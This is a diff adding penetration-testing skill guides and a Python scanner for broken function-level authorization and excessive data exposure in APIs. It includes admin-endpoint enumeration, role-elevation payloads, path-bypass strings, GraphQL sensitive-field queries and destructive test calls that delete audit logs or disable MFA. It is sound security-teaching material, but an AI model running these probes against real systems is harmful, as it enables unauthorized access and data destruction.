+subdomain: api-security
+tags:
+- api-security
+- owasp
+- authorization
+- bfla
+- privilege-escalation
+- access-control
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1068
+- T1548
+---
+# Exploiting Broken Function Level Authorization
+
+## When to Use
+
+- Testing whether regular users can access administrative API endpoints by direct URL access
+- Assessing APIs for vertical privilege escalation where users can invoke functions above their role
+- Evaluating if API gateways and middleware consistently enforce function-level access controls
+- Testing role-based access control (RBAC) implementation across all API endpoints and HTTP methods
+- Validating that API documentation does not expose admin endpoint paths that lack authorization
+
+**Do not use** without written authorization. BFLA testing involves attempting to execute administrative functions with unauthorized credentials.
+
+## Prerequisites
+
+- Written authorization specifying target API and administrative functions in scope
+- Test accounts at multiple privilege levels: regular user, moderator, admin, super-admin
+- API documentation (OpenAPI/Swagger spec) that may list admin endpoints
+- Burp Suite Professional for request interception and manipulation
+- Python 3.10+ with `requests` library
+- Knowledge of common admin endpoint naming conventions
+
+## Workflow
+
+### Step 1: Administrative Endpoint Discovery
+
+```python
+import requests
+import itertools
+
+BASE_URL = "https://target-api.example.com"
+regular_user_headers = {"Authorization": "Bearer <regular_user_token>"}
+admin_headers = {"Authorization": "Bearer <admin_token>"}
+
+# Common admin endpoint patterns
+ADMIN_PATH_PATTERNS = [
+    "/api/v1/admin",
+    "/api/v1/admin/users",
+    "/api/v1/admin/settings",
+    "/api/v1/admin/config",
+    "/api/v1/admin/logs",
+    "/api/v1/admin/dashboard",
+    "/api/v1/admin/reports",
+    "/api/v1/admin/billing",
+    "/api/v1/manage",
+    "/api/v1/management",
+    "/api/v1/internal",
+    "/api/v1/internal/users",
+    "/api/v1/system",
+    "/api/v1/system/health",
+    "/api/v1/console",
+    "/api/v1/users/admin",
+    "/api/v1/roles",
+    "/api/v1/permissions",
+    "/api/v1/audit",
+    "/api/v1/audit/logs",
+    "/api/internal/",
+    "/admin/api/",
+    "/management/api/",
+    "/backoffice/api/",
+]
+
+# Administrative function patterns (POST/PUT/DELETE operations)
+ADMIN_FUNCTIONS = [
+    ("POST", "/api/v1/users", {"role": "admin"}),             # Create user with admin role
+    ("PUT", "/api/v1/users/1/role", {"role": "admin"}),        # Change user role
+    ("DELETE", "/api/v1/users/1002", None),                     # Delete another user
+    ("POST", "/api/v1/settings", {"maintenance": True}),       # Modify system settings
+    ("GET", "/api/v1/users?role=admin", None),                  # List admin users
+    ("POST", "/api/v1/export/users", None),                     # Export user data
+    ("POST", "/api/v1/users/1002/disable", None),               # Disable user account
+    ("POST", "/api/v1/users/1002/reset-password", None),        # Force password reset
+    ("PUT", "/api/v1/config/security", {"mfa_required": False}),# Disable security
+    ("DELETE", "/api/v1/audit/logs", None),                     # Delete audit logs
+]
+
+# Phase 1: Discover accessible admin endpoints
+print("Phase 1: Admin Endpoint Discovery")
+for path in ADMIN_PATH_PATTERNS:
+    for method in ["GET", "POST", "PUT", "DELETE", "PATCH"]:
+        try:
+            resp = requests.request(method, f"{BASE_URL}{path}",
+                                  headers=regular_user_headers, timeout=5)
+            if resp.status_code not in (401, 403, 404, 405):
+                print(f"  [ACCESSIBLE] {method} {path} -> {resp.status_code}")
+        except requests.exceptions.RequestException:
+            pass
+```
+
+### Step 2: Role-Based Function Testing
+
+```python
+# Define roles and their expected access levels
+ROLES = {
+    "unauthenticated": {},
+    "regular_user": {"Authorization": "Bearer <regular_token>"},
+    "moderator": {"Authorization": "Bearer <moderator_token>"},
+    "admin": {"Authorization": "Bearer <admin_token>"},
+}
+
+# Endpoints with expected minimum role requirement
+ROLE_MATRIX = [
+    # (method, endpoint, body, minimum_role)
+    ("GET", "/api/v1/users/me", None, "regular_user"),
+    ("GET", "/api/v1/users", None, "admin"),
+    ("POST", "/api/v1/users", {"email":"x@y.com","name":"X","role":"user"}, "admin"),
+    ("DELETE", "/api/v1/users/1002", None, "admin"),
+    ("GET", "/api/v1/admin/settings", None, "admin"),
+    ("PUT", "/api/v1/admin/settings", {"feature_flag": True}, "admin"),
+    ("GET", "/api/v1/reports/financial", None, "admin"),
+    ("POST", "/api/v1/users/1002/ban", None, "moderator"),
+    ("GET", "/api/v1/audit/logs", None, "admin"),
+    ("POST", "/api/v1/export/database", None, "admin"),
+    ("PUT", "/api/v1/users/1002/role", {"role": "admin"}, "admin"),
+]
+
+ROLE_HIERARCHY = ["unauthenticated", "regular_user", "moderator", "admin"]
+
+results = []
+for method, endpoint, body, min_role in ROLE_MATRIX:
+    min_index = ROLE_HIERARCHY.index(min_role)
+    for role_name, role_headers in ROLES.items():
+        role_index = ROLE_HIERARCHY.index(role_name)
+        if role_index < min_index:  # This role should NOT have access
+            resp = requests.request(method, f"{BASE_URL}{endpoint}",
+                                  headers=role_headers, json=body, timeout=5)
+            if resp.status_code not in (401, 403):
+                results.append({
+                    "endpoint": f"{method} {endpoint}",
+                    "role_used": role_name,
+                    "expected_min_role": min_role,
+                    "status_code": resp.status_code,
+                    "vulnerable": True
+                })
+                print(f"  [BFLA] {role_name} accessed {method} {endpoint} (requires {min_role}) -> {resp.status_code}")
+
+print(f"\nTotal BFLA findings: {len(results)}")
+```
+
+### Step 3: HTTP Method Manipulation
+
+```python
+# Test if authorization is method-dependent
+def test_method_based_bfla(endpoint, authorized_method="GET"):
+    """Test if authorization only applies to certain HTTP methods."""
+    methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS", "TRACE"]
+
+    print(f"\nTesting method-based BFLA on {endpoint}:")
+    for method in methods:
+        try:
+            resp = requests.request(method, f"{BASE_URL}{endpoint}",
+                                  headers=regular_user_headers,
+                                  json={"test": True} if method in ("POST","PUT","PATCH") else None,
+                                  timeout=5)
+            status = "ACCESSIBLE" if resp.status_code not in (401, 403, 405) else "blocked"
+            if status == "ACCESSIBLE":
+                print(f"  [{status}] {method} {endpoint} -> {resp.status_code}")
+        except requests.exceptions.RequestException:
+            pass
+
+# Admin endpoints to test
+test_method_based_bfla("/api/v1/admin/users")
+test_method_based_bfla("/api/v1/admin/settings")
+test_method_based_bfla("/api/v1/users/1002")
+```
+
+### Step 4: Parameter-Based Privilege Escalation
+
+```python
+# Test if adding admin parameters to regular requests enables admin functions
+privilege_escalation_tests = [
+    # Test 1: Add role parameter to self-update
+    {
+        "name": "Self role elevation via profile update",
+        "method": "PUT",
+        "endpoint": "/api/v1/users/me",
+        "body": {"name": "Test User", "role": "admin"},
+    },
+    # Test 2: Add admin flag
+    {
+        "name": "Admin flag injection",
+        "method": "PUT",
+        "endpoint": "/api/v1/users/me",
+        "body": {"name": "Test User", "is_admin": True, "isAdmin": True, "admin": True},
+    },
+    # Test 3: Modify user ID in body to target other users
+    {
+        "name": "User ID substitution in body",
+        "method": "PUT",
+        "endpoint": "/api/v1/users/me",
+        "body": {"id": 1, "user_id": 1, "role": "admin"},
+    },
+    # Test 4: Access admin function via regular endpoint with admin params
+    {
+        "name": "Hidden admin parameter",
+        "method": "GET",
+        "endpoint": "/api/v1/users?admin=true&debug=true&internal=true",
+        "body": None,
+    },
+    # Test 5: Override tenant/organization
+    {
+        "name": "Tenant override",
+        "method": "GET",
+        "endpoint": "/api/v1/users",
+        "body": None,
+        "extra_headers": {"X-Tenant-Id": "admin-org", "X-Organization": "1"},
+    },
+]
+
+for test in privilege_escalation_tests:
+    extra = test.get("extra_headers", {})
+    resp = requests.request(
+        test["method"],
+        f"{BASE_URL}{test['endpoint']}",
+        headers={**regular_user_headers, **extra},
+        json=test["body"],
+        timeout=5
+    )
+    if resp.status_code in (200, 201, 204):
+        print(f"[BFLA] {test['name']}: {resp.status_code}")
+        # Check if role actually changed
+        if "role" in test.get("body", {}):
+            me_resp = requests.get(f"{BASE_URL}/api/v1/users/me",
+                                  headers=regular_user_headers)
+            if me_resp.status_code == 200:
+                current_role = me_resp.json().get("role", "unknown")
+                print(f"  Current role after exploit: {current_role}")
+```
+
+### Step 5: API Version and Path Traversal for Admin Access
+
+```python
+# Test if older or alternative API versions lack authorization
+api_versions = ["v1", "v2", "v3", "v0", "beta", "alpha", "internal", "legacy", "staging"]
+admin_paths = ["/admin/users", "/admin/settings", "/users", "/config"]
+
+print("Testing API version bypass:")
+for version in api_versions:
+    for path in admin_paths:
+        full_path = f"/api/{version}{path}"
+        resp = requests.get(f"{BASE_URL}{full_path}",
+                          headers=regular_user_headers, timeout=5)
+        if resp.status_code not in (401, 403, 404):
+            print(f"  [BYPASS] {full_path} -> {resp.status_code}")
+
+# Test path-based bypass techniques
+bypass_paths = [
+    "/api/v1/admin/users",
+    "/api/v1/Admin/users",          # Case variation
+    "/api/v1/ADMIN/users",
+    "/api/v1/%61dmin/users",        # URL encoding
+    "/api/v1/./admin/users",        # Path traversal
+    "/api/v1/admin/../admin/users", # Double path
+    "/api/v1/;/admin/users",        # Semicolon insertion
+    "/api/v1/admin/users.json",     # Extension addition
+    "/api/v1/admin/users/",         # Trailing slash
+]
+
+for path in bypass_paths:
+    resp = requests.get(f"{BASE_URL}{path}",
+                       headers=regular_user_headers, timeout=5)
+    if resp.status_code not in (401, 403, 404):
+        print(f"  [PATH BYPASS] {path} -> {resp.status_code}")
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **BFLA** | Broken Function Level Authorization (OWASP API5:2023) - regular users can invoke administrative or privileged API functions without proper authorization checks |
+| **Vertical Privilege Escalation** | Accessing functions or data restricted to a higher privilege level, such as regular user accessing admin endpoints |
+| **RBAC** | Role-Based Access Control - authorization model where permissions are assigned to roles and roles are assigned to users |
+| **Function-Level Authorization** | Access control checks that verify whether the authenticated user has permission to invoke a specific API function |
+| **Admin Endpoint** | API endpoints intended only for administrative users, typically managing users, settings, audit logs, and system configuration |
+| **Forced Browsing** | Directly accessing URLs that are not linked in the application but exist on the server, bypassing UI-level access restrictions |
+
+## Tools & Systems
+
+- **Burp Suite Professional**: Intercept requests as admin, then replay with regular user token to test function-level authorization
+- **OWASP ZAP**: Forced Browse scanner to discover hidden administrative endpoints and test access control
+- **Autorize (Burp Extension)**: Automated BFLA detection by replaying admin requests with regular user credentials
+- **ffuf**: Endpoint discovery tool: `ffuf -u https://api.example.com/api/v1/FUZZ -w admin-endpoints.txt -H "Authorization: Bearer user_token"`
+- **Nuclei**: Template-based scanner with BFLA detection templates for common frameworks
+
+## Common Scenarios
+
+### Scenario: SaaS Multi-Tenant API BFLA Assessment
+
+**Context**: A SaaS platform has user, moderator, and admin roles. The API serves a React frontend that conditionally renders admin features based on the user's role. The backend API should enforce the same restrictions independently.
+
+**Approach**:
+1. Map admin endpoints from the frontend JavaScript bundle: search for `/admin/`, `/manage/`, and role-check conditionals
+2. Discover 12 admin endpoints including user management, billing, feature flags, and audit logs
+3. Test each admin endpoint with regular user token:
+   - `GET /api/v1/admin/users` returns 200 with all user data (BFLA - read)
+   - `PUT /api/v1/admin/users/1002/role` accepts role change (BFLA - write)
+   - `DELETE /api/v1/audit/logs` returns 200 (BFLA - destructive)
+4. Test method-based bypass: `GET /api/v1/admin/settings` returns 403, but `PUT /api/v1/admin/settings` returns 200
+5. Find that the moderator role can access all admin endpoints except `DELETE /api/v1/admin/billing`
+6. Discover `/api/v2/admin/users` exists without any authorization (shadow API version)
+
+**Pitfalls**:
+- Only testing GET requests on admin endpoints while missing BFLA in POST/PUT/DELETE methods
+- Not discovering admin endpoints because they are not linked in the UI (requires endpoint enumeration)
+- Assuming RBAC is enforced consistently because one admin endpoint returned 403
+- Missing BFLA in internal/undocumented API endpoints not listed in the OpenAPI specification
+- Not testing with all available role levels (moderator may have partial admin access)
+
+## Output Format
+
+```
+## Finding: Regular Users Can Access Admin User Management API
+
+**ID**: API-BFLA-001
+**Severity**: Critical (CVSS 9.8)
+**OWASP API**: API5:2023 - Broken Function Level Authorization
+**Affected Endpoints**:
+  - GET /api/v1/admin/users (read all users)
+  - PUT /api/v1/admin/users/{id}/role (change user roles)
+  - DELETE /api/v1/audit/logs (delete audit trail)
+  - PUT /api/v1/admin/settings (modify system config)
+
+**Description**:
+The API does not enforce function-level authorization on administrative
+endpoints. A regular user can directly call admin API endpoints and
+execute administrative functions including user management, role changes,
+system configuration, and audit log deletion. The frontend hides admin
+features based on role, but the backend API does not enforce the same
+restrictions.
+
+**Proof of Concept**:
+1. Authenticate as regular user: POST /api/v1/auth/login
+2. Call admin endpoint: GET /api/v1/admin/users -> 200 OK (returns all 50,000 users)
+3. Elevate own role: PUT /api/v1/admin/users/me/role {"role":"admin"} -> 200 OK
+4. Delete audit logs: DELETE /api/v1/audit/logs -> 204 No Content
+
+**Impact**:
+Any authenticated user can take full administrative control of the
+platform, access all user data, modify roles, change system configuration,
+and delete audit logs to cover their tracks.
+
+**Remediation**:
+1. Implement RBAC middleware that checks user role before executing any admin function
+2. Apply authorization at the route/controller level, not just the frontend
+3. Use decorator/annotation-based authorization (e.g., @RequireRole("admin"))
+4. Add automated BFLA tests to the CI/CD pipeline that test every endpoint with every role
+5. Implement immutable audit logging that admin users cannot delete
+```

--- a/security/skills/exploiting-broken-function-level-authorization/references/api-reference.md
+++ b/security/skills/exploiting-broken-function-level-authorization/references/api-reference.md
@@ -1,0 +1,89 @@
+# API Reference: Broken Function Level Authorization (BFLA)
+
+## OWASP API5:2023 — Broken Function Level Authorization
+
+### Description
+API endpoints expose functions that should be restricted to specific roles.
+Low-privileged users can invoke admin-level functionality.
+
+### Common Patterns
+| Pattern | Example |
+|---------|---------|
+| Guessable admin paths | `/api/admin/users` |
+| Method switching | POST allowed but PUT bypasses auth |
+| Role parameter manipulation | `{"role": "admin"}` in request |
+| Vertical privilege escalation | User accessing admin endpoints |
+
+## Testing Methodology
+
+### Step 1: Discover Endpoints
+```bash
+# From OpenAPI spec
+curl https://api.target.com/swagger.json | jq '.paths | keys'
+
+# From JavaScript source
+grep -oP '["'"'"']/api/[^"'"'"']+' app.js
+```
+
+### Step 2: Test with Low-Priv Token
+```bash
+curl -H "Authorization: Bearer <low_priv_token>" \
+     https://api.target.com/api/admin/users
+```
+
+### Step 3: Test HTTP Method Switching
+```bash
+# If GET returns 403, try POST/PUT/DELETE
+curl -X PUT -H "Authorization: Bearer <low_priv_token>" \
+     https://api.target.com/api/admin/users/1
+```
+
+## Python requests Library
+
+### Request with Token
+```python
+headers = {"Authorization": f"Bearer {token}"}
+resp = requests.get(url, headers=headers, timeout=10, verify=False)
+```
+
+### Method Switching
+```python
+for method in ["GET", "POST", "PUT", "DELETE", "PATCH"]:
+    resp = requests.request(method, url, headers=headers, timeout=10)
+    if resp.status_code < 400:
+        print(f"Accessible via {method}: {resp.status_code}")
+```
+
+## Common Admin Endpoints to Test
+
+```
+/admin
+/api/admin
+/api/v1/admin/users
+/api/internal
+/manage
+/api/config
+/api/debug
+/api/users/all
+/api/system/settings
+/graphql (with admin mutations)
+```
+
+## Burp Suite — Authorization Testing
+
+### Autorize Extension
+1. Install Autorize from BApp Store
+2. Set low-privilege cookie/token
+3. Browse application as admin
+4. Autorize replays requests with low-priv token
+5. Compare responses for authorization bypass
+
+## Response Analysis
+
+| Indicator | Meaning |
+|-----------|---------|
+| 200 with data | Full access (vulnerability) |
+| 200 empty body | Possible partial bypass |
+| 403 Forbidden | Properly restricted |
+| 401 Unauthorized | Auth required |
+| 405 Method Not Allowed | Method restricted |

--- a/security/skills/exploiting-broken-function-level-authorization/scripts/agent.py
+++ b/security/skills/exploiting-broken-function-level-authorization/scripts/agent.py
@@ -1,0 +1,129 @@
+#!/usr/bin/env python3
+"""Agent for testing Broken Function Level Authorization (BFLA) in APIs."""
+
+import argparse
+import json
+from datetime import datetime, timezone
+
+try:
+    import requests
+    HAS_REQUESTS = True
+except ImportError:
+    HAS_REQUESTS = False
+
+
+ADMIN_ENDPOINTS = [
+    "/admin", "/admin/users", "/admin/settings", "/admin/config",
+    "/api/admin/users", "/api/v1/admin", "/api/internal",
+    "/manage", "/management", "/dashboard/admin",
+    "/api/users/all", "/api/config", "/api/debug",
+]
+
+HTTP_METHODS = ["GET", "POST", "PUT", "DELETE", "PATCH"]
+
+
+def test_endpoint_access(base_url, endpoint, token, method="GET"):
+    """Test if an endpoint is accessible with given credentials."""
+    if not HAS_REQUESTS:
+        return None
+    url = f"{base_url.rstrip('/')}{endpoint}"
+    headers = {"Authorization": f"Bearer {token}"} if token else {}
+    try:
+        resp = requests.request(method, url, headers=headers, timeout=10, verify=False)
+        return {
+            "endpoint": endpoint,
+            "method": method,
+            "status_code": resp.status_code,
+            "response_size": len(resp.content),
+            "accessible": resp.status_code < 400,
+        }
+    except requests.RequestException:
+        return None
+
+
+def test_method_switching(base_url, endpoint, token):
+    """Test if changing HTTP method bypasses authorization."""
+    results = []
+    for method in HTTP_METHODS:
+        result = test_endpoint_access(base_url, endpoint, token, method)
+        if result and result["accessible"]:
+            results.append(result)
+    return results
+
+
+def test_privilege_escalation(base_url, low_priv_token, endpoints=None):
+    """Test if low-privilege user can access admin endpoints."""
+    findings = []
+    test_endpoints = endpoints or ADMIN_ENDPOINTS
+    for ep in test_endpoints:
+        result = test_endpoint_access(base_url, ep, low_priv_token)
+        if result and result["accessible"]:
+            findings.append({
+                "vulnerability": "BFLA",
+                "endpoint": ep,
+                "status_code": result["status_code"],
+                "response_size": result["response_size"],
+                "severity": "HIGH",
+            })
+    return findings
+
+
+def test_idor_via_function(base_url, token, user_id, target_user_id):
+    """Test function-level auth by accessing another user's admin functions."""
+    findings = []
+    endpoints = [
+        f"/api/users/{target_user_id}",
+        f"/api/users/{target_user_id}/settings",
+        f"/api/users/{target_user_id}/role",
+    ]
+    for ep in endpoints:
+        for method in ["GET", "PUT", "DELETE"]:
+            result = test_endpoint_access(base_url, ep, token, method)
+            if result and result["accessible"]:
+                findings.append({
+                    "vulnerability": "BFLA+IDOR",
+                    "endpoint": ep,
+                    "method": method,
+                    "own_user_id": user_id,
+                    "target_user_id": target_user_id,
+                })
+    return findings
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Test Broken Function Level Authorization (authorized testing only)"
+    )
+    parser.add_argument("--url", required=True, help="Base API URL")
+    parser.add_argument("--token", help="Low-privilege user JWT token")
+    parser.add_argument("--endpoints", nargs="*", help="Custom admin endpoints to test")
+    parser.add_argument("--user-id", help="Current user ID")
+    parser.add_argument("--target-id", help="Target user ID for IDOR test")
+    parser.add_argument("--output", "-o", help="Output JSON report")
+    args = parser.parse_args()
+
+    print("[*] BFLA Testing Agent")
+    print("[!] For authorized security testing only")
+    report = {"timestamp": datetime.now(timezone.utc).isoformat(), "target": args.url, "findings": []}
+
+    escalation = test_privilege_escalation(args.url, args.token, args.endpoints)
+    report["findings"].extend(escalation)
+    print(f"[*] Privilege escalation findings: {len(escalation)}")
+
+    if args.user_id and args.target_id:
+        idor = test_idor_via_function(args.url, args.token, args.user_id, args.target_id)
+        report["findings"].extend(idor)
+        print(f"[*] IDOR findings: {len(idor)}")
+
+    report["risk_level"] = "CRITICAL" if report["findings"] else "LOW"
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"[*] Report saved to {args.output}")
+    else:
+        print(json.dumps(report, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/exploiting-excessive-data-exposure-in-api/SKILL.md
+++ b/security/skills/exploiting-excessive-data-exposure-in-api/SKILL.md
@@ -1,0 +1,392 @@
+---
+name: exploiting-excessive-data-exposure-in-api
+description: 'Tests APIs for excessive data exposure where endpoints return more data
+  than the client application needs, relying on the frontend to filter sensitive fields.
+  The tester intercepts API responses and analyzes them for leaked PII, internal identifiers,
+  debug information, or sensitive business data that the UI does not display but the
+  API transmits. This maps to OWASP API3:2023 Broken Object Property Level Authorization.
+  Activates for requests involving API data leakage testing, excessive data exposure,
+  response filtering bypass, or API over-fetching.
+
+  '
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- owasp
+- data-exposure
+- rest-security
+- pii-leakage
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1027
+- T1070
+---
+# Exploiting Excessive Data Exposure in API
+
+## When to Use
+
+- Testing APIs where the frontend displays a subset of data but the API response includes additional fields
+- Assessing mobile application APIs where responses are designed for multiple client types and may contain excess data
+- Identifying PII leakage in API responses that include email addresses, phone numbers, SSNs, or payment data not shown in the UI
+- Testing GraphQL APIs where clients can request arbitrary fields including sensitive attributes
+- Evaluating APIs after microservice refactoring where internal service-to-service data leaks into public endpoints
+
+**Do not use** without written authorization. Data exposure testing involves capturing and analyzing potentially sensitive personal data.
+
+## Prerequisites
+
+- Written authorization specifying target API endpoints and scope
+- Burp Suite Professional or mitmproxy configured as intercepting proxy
+- Two test accounts at different privilege levels (regular user and admin)
+- Browser developer tools or mobile proxy setup for traffic capture
+- Python 3.10+ with `requests` and `json` libraries
+- API documentation (OpenAPI spec) for comparison against actual responses
+
+
+> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
+
+## Workflow
+
+### Step 1: Response Schema Discovery
+
+Compare documented API responses with actual responses:
+
+```python
+import requests
+import json
+
+BASE_URL = "https://target-api.example.com/api/v1"
+headers = {"Authorization": "Bearer <user_token>", "Content-Type": "application/json"}
+
+# Fetch a resource and analyze all returned fields
+endpoints_to_test = [
+    ("GET", "/users/me", None),
+    ("GET", "/users/me/orders", None),
+    ("GET", "/products", None),
+    ("GET", "/users/me/settings", None),
+    ("GET", "/transactions", None),
+]
+
+for method, path, body in endpoints_to_test:
+    resp = requests.request(method, f"{BASE_URL}{path}", headers=headers, json=body)
+    if resp.status_code == 200:
+        data = resp.json()
+        # Recursively extract all field names
+        def extract_fields(obj, prefix=""):
+            fields = []
+            if isinstance(obj, dict):
+                for k, v in obj.items():
+                    full_key = f"{prefix}.{k}" if prefix else k
+                    fields.append(full_key)
+                    fields.extend(extract_fields(v, full_key))
+            elif isinstance(obj, list) and obj:
+                fields.extend(extract_fields(obj[0], f"{prefix}[]"))
+            return fields
+
+        all_fields = extract_fields(data)
+        print(f"\n{method} {path} - {len(all_fields)} fields returned:")
+        for f in sorted(all_fields):
+            print(f"  {f}")
+```
+
+### Step 2: Sensitive Data Pattern Detection
+
+Scan API responses for sensitive data patterns:
+
+```python
+import re
+
+SENSITIVE_PATTERNS = {
+    "email": r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
+    "phone": r'(\+?1?\s?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4})',
+    "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
+    "credit_card": r'\b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|3[47][0-9]{13})\b',
+    "password_hash": r'\$2[aby]?\$\d{2}\$[./A-Za-z0-9]{53}',
+    "api_key": r'(?:api[_-]?key|apikey)["\s:=]+["\']?([a-zA-Z0-9_\-]{20,})',
+    "internal_ip": r'\b(?:10\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])|192\.168)\.\d{1,3}\.\d{1,3}\b',
+    "aws_key": r'AKIA[0-9A-Z]{16}',
+    "jwt_token": r'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+',
+    "uuid": r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
+}
+
+SENSITIVE_FIELD_NAMES = [
+    "password", "password_hash", "secret", "token", "ssn", "social_security",
+    "credit_card", "card_number", "cvv", "pin", "private_key", "api_key",
+    "internal_id", "debug", "trace", "stack_trace", "created_by_ip",
+    "last_login_ip", "salt", "session_id", "refresh_token", "mfa_secret",
+    "date_of_birth", "bank_account", "routing_number", "tax_id"
+]
+
+def scan_response(endpoint, response_text):
+    findings = []
+    # Check for sensitive data patterns in values
+    for pattern_name, pattern in SENSITIVE_PATTERNS.items():
+        matches = re.findall(pattern, response_text)
+        if matches:
+            findings.append({
+                "endpoint": endpoint,
+                "type": "sensitive_value",
+                "pattern": pattern_name,
+                "count": len(matches),
+                "sample": matches[0][:20] + "..." if len(matches[0]) > 20 else matches[0]
+            })
+
+    # Check for sensitive field names
+    response_lower = response_text.lower()
+    for field in SENSITIVE_FIELD_NAMES:
+        if f'"{field}"' in response_lower or f"'{field}'" in response_lower:
+            findings.append({
+                "endpoint": endpoint,
+                "type": "sensitive_field",
+                "field_name": field
+            })
+
+    return findings
+
+# Scan all endpoint responses
+for method, path, body in endpoints_to_test:
+    resp = requests.request(method, f"{BASE_URL}{path}", headers=headers, json=body)
+    if resp.status_code == 200:
+        findings = scan_response(f"{method} {path}", resp.text)
+        for f in findings:
+            print(f"[FINDING] {f['endpoint']}: {f['type']} - {f.get('pattern', f.get('field_name'))}")
+```
+
+### Step 3: Compare UI Display vs API Response
+
+```python
+# Fields the UI shows (observed from the frontend application)
+ui_displayed_fields = {
+    "/users/me": {"name", "email", "avatar_url", "role"},
+    "/users/me/orders": {"order_id", "date", "status", "total"},
+    "/products": {"id", "name", "price", "image_url", "description"},
+}
+
+# Fields the API actually returns
+for method, path, body in endpoints_to_test:
+    resp = requests.request(method, f"{BASE_URL}{path}", headers=headers, json=body)
+    if resp.status_code == 200:
+        data = resp.json()
+        if isinstance(data, list):
+            actual_fields = set(data[0].keys()) if data else set()
+        elif isinstance(data, dict):
+            # Handle paginated responses
+            items_key = next((k for k in data if isinstance(data[k], list)), None)
+            if items_key and data[items_key]:
+                actual_fields = set(data[items_key][0].keys())
+            else:
+                actual_fields = set(data.keys())
+        else:
+            continue
+
+        expected = ui_displayed_fields.get(path, set())
+        excess = actual_fields - expected
+        if excess:
+            print(f"\n{method} {path} - EXCESS FIELDS (not shown in UI):")
+            for field in sorted(excess):
+                print(f"  - {field}")
+```
+
+### Step 4: Test User Object Exposure in Related Endpoints
+
+```python
+# Many APIs embed full user objects in responses for orders, comments, etc.
+endpoints_with_user_objects = [
+    "/orders",          # Each order may include full seller/buyer profile
+    "/comments",        # Comments may include full author profile
+    "/reviews",         # Reviews may expose reviewer details
+    "/transactions",    # Transactions may include counterparty info
+    "/team/members",    # Team listing may expose excessive member data
+]
+
+for path in endpoints_with_user_objects:
+    resp = requests.get(f"{BASE_URL}{path}", headers=headers)
+    if resp.status_code == 200:
+        text = resp.text
+        # Check for user data leakage in nested objects
+        user_fields_found = []
+        for field in ["password_hash", "last_login_ip", "mfa_enabled", "phone_number",
+                      "date_of_birth", "ssn", "internal_notes", "salary", "address"]:
+            if f'"{field}"' in text:
+                user_fields_found.append(field)
+        if user_fields_found:
+            print(f"[EXCESSIVE] {path} exposes user fields: {user_fields_found}")
+```
+
+### Step 5: GraphQL Over-Fetching Analysis
+
+```python
+# GraphQL allows clients to request any available field
+GRAPHQL_URL = f"{BASE_URL}/graphql"
+
+# Introspection query to discover all fields on User type
+introspection = {
+    "query": """
+    {
+      __type(name: "User") {
+        fields {
+          name
+          type {
+            name
+            kind
+          }
+        }
+      }
+    }
+    """
+}
+
+resp = requests.post(GRAPHQL_URL, headers=headers, json=introspection)
+if resp.status_code == 200:
+    fields = resp.json().get("data", {}).get("__type", {}).get("fields", [])
+    print("Available User fields via GraphQL:")
+    for f in fields:
+        sensitivity = "SENSITIVE" if f["name"] in SENSITIVE_FIELD_NAMES else "normal"
+        print(f"  {f['name']} ({f['type']['name']}) [{sensitivity}]")
+
+# Try to query sensitive fields
+sensitive_query = {
+    "query": """
+    query {
+      users {
+        id
+        email
+        passwordHash
+        socialSecurityNumber
+        internalNotes
+        lastLoginIp
+        mfaSecret
+        apiKey
+      }
+    }
+    """
+}
+resp = requests.post(GRAPHQL_URL, headers=headers, json=sensitive_query)
+if resp.status_code == 200 and "errors" not in resp.json():
+    print("[CRITICAL] GraphQL exposes sensitive user fields without restriction")
+```
+
+### Step 6: Debug and Internal Data Leakage
+
+```python
+# Test for debug information in responses
+debug_headers_to_check = [
+    "X-Debug-Token", "X-Debug-Info", "Server", "X-Powered-By",
+    "X-Request-Id", "X-Correlation-Id", "X-Backend-Server",
+    "X-Runtime", "X-Version", "X-Build-Version"
+]
+
+resp = requests.get(f"{BASE_URL}/users/me", headers=headers)
+for h in debug_headers_to_check:
+    if h.lower() in {k.lower(): v for k, v in resp.headers.items()}:
+        print(f"[INFO LEAK] Header {h}: {resp.headers.get(h)}")
+
+# Test error responses for stack traces
+error_payloads = [
+    ("GET", "/users/invalid-id-format", None),
+    ("POST", "/orders", {"invalid": "payload"}),
+    ("GET", "/users/-1", None),
+    ("GET", "/users/0", None),
+]
+
+for method, path, body in error_payloads:
+    resp = requests.request(method, f"{BASE_URL}{path}", headers=headers, json=body)
+    if resp.status_code >= 400:
+        text = resp.text.lower()
+        if any(kw in text for kw in ["stack trace", "traceback", "at com.", "at org.",
+                                      "file \"", "line ", "exception", "sql", "query"]):
+            print(f"[DEBUG LEAK] {method} {path} -> {resp.status_code}: Contains stack trace or query info")
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **Excessive Data Exposure** | API returns more data fields than the client needs, relying on frontend filtering to hide sensitive information from users |
+| **Over-Fetching** | Requesting or receiving more data than needed for a specific operation, common in REST APIs that return fixed response schemas |
+| **Response Filtering** | Client-side filtering of API response data to display only relevant fields, which provides zero security since the full response is interceptable |
+| **Object Property Level Authorization** | OWASP API3:2023 - ensuring that users can only read/write object properties they are authorized to access |
+| **PII Leakage** | Unintended exposure of Personally Identifiable Information in API responses including names, emails, addresses, SSNs, or financial data |
